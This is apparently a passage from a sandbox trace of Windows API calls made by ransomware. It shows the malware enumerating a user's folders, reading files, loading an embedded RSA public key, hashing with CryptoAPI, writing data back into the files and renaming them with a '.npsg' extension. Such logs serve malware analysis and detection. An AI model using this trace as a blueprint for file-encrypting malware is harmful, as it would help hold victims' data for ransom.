hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.089] CloseHandle (hObject=0x644) returned 1 [0239.092] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\ZxYF5gpA.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\zxyf5gpa.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\ZxYF5gpA.m4a.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\zxyf5gpa.m4a.npsg")) returned 1 [0239.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0239.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.093] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0239.095] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60ca6140, ftCreationTime.dwHighDateTime=0x1d5b9b6, ftLastAccessTime.dwLowDateTime=0x639d2e10, ftLastAccessTime.dwHighDateTime=0x1d5b7fa, ftLastWriteTime.dwLowDateTime=0x639d2e10, ftLastWriteTime.dwHighDateTime=0x1d5b7fa, nFileSizeHigh=0x0, nFileSizeLow=0xd84d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZxYF5gpA.m4a", cAlternateFileName="")) returned 0 [0239.095] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0239.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0239.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a6e8 | out: hHeap=0x620000) returned 1 [0239.095] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0239.095] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0239.096] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\") returned="lEiN6S__d\\" [0239.096] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\") returned="2DVGfW2 wBKbSvaIoJ2e\\" [0239.096] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0239.096] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0239.096] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0239.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.096] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0239.096] PathFindFileNameW (pszPath="") returned="" [0239.096] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaff72640, ftCreationTime.dwHighDateTime=0x1d5b759, ftLastAccessTime.dwLowDateTime=0xc509e60, ftLastAccessTime.dwHighDateTime=0x1d5c477, ftLastWriteTime.dwLowDateTime=0xc509e60, ftLastWriteTime.dwHighDateTime=0x1d5c477, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0239.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.100] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaff72640, ftCreationTime.dwHighDateTime=0x1d5b759, ftLastAccessTime.dwLowDateTime=0xc509e60, ftLastAccessTime.dwHighDateTime=0x1d5c477, ftLastWriteTime.dwLowDateTime=0xc509e60, ftLastWriteTime.dwHighDateTime=0x1d5c477, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0239.100] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b57aab0, ftCreationTime.dwHighDateTime=0x1d5bc5a, ftLastAccessTime.dwLowDateTime=0xf449de50, ftLastAccessTime.dwHighDateTime=0x1d5bfe7, ftLastWriteTime.dwLowDateTime=0xf449de50, ftLastWriteTime.dwHighDateTime=0x1d5bfe7, nFileSizeHigh=0x0, nFileSizeLow=0x16ed7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="39MviVki.png", cAlternateFileName="")) returned 1 [0239.101] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\39MviVki.png") returned=".png" [0239.101] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\39MviVki.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lein6s__d\\39mvivki.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.101] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=93911) returned 1 [0239.101] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.104] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x16eb1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.104] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.105] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x16ed7, lpOverlapped=0x0) returned 1 [0239.106] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.106] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.106] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.107] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0239.107] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.108] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.108] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.108] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.108] GetLastError () returned 0x0 [0239.108] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.108] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0239.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.108] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.108] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.108] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16ee0) returned 0x3b95d50 [0239.109] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0239.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0239.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0239.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0239.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b864c8 [0239.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c80 [0239.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86510 [0239.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c98 [0239.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cc8 [0239.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d28 [0239.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ce0 [0239.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0239.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0239.109] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cc8 | out: hHeap=0x620000) returned 1 [0239.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ce0 | out: hHeap=0x620000) returned 1 [0239.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d28 | out: hHeap=0x620000) returned 1 [0239.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0239.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d28 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400ce0 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400cc8 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0239.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ce0 | out: hHeap=0x620000) returned 1 [0239.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cc8 | out: hHeap=0x620000) returned 1 [0239.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d28 | out: hHeap=0x620000) returned 1 [0239.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0239.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.110] GetCurrentThreadId () returned 0x5b4 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b87b88 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0239.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.111] GetCurrentThreadId () returned 0x5b4 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0239.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d28 [0239.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0239.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0239.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0239.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cc8 [0239.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0239.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0239.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0239.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0239.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400ce0 [0239.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0239.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0239.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cb0 [0239.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0239.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400d40 [0239.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0239.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0239.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d10 [0239.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cf8 [0239.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400d58 [0239.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cf8 | out: hHeap=0x620000) returned 1 [0239.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400cf8 [0239.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d10 | out: hHeap=0x620000) returned 1 [0239.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0239.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0239.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0239.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cc8 | out: hHeap=0x620000) returned 1 [0239.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400cc8 [0239.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0239.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d28 | out: hHeap=0x620000) returned 1 [0239.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0239.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d58 | out: hHeap=0x620000) returned 1 [0239.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0239.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0239.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0239.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0239.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cc8 | out: hHeap=0x620000) returned 1 [0239.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0239.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0239.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0239.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a6e8 | out: hHeap=0x620000) returned 1 [0239.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0239.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0239.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0239.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0239.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0239.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0239.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cf8 | out: hHeap=0x620000) returned 1 [0239.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0239.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d40 | out: hHeap=0x620000) returned 1 [0239.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ce0 | out: hHeap=0x620000) returned 1 [0239.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cb0 | out: hHeap=0x620000) returned 1 [0239.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.115] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x16ed7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.115] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, 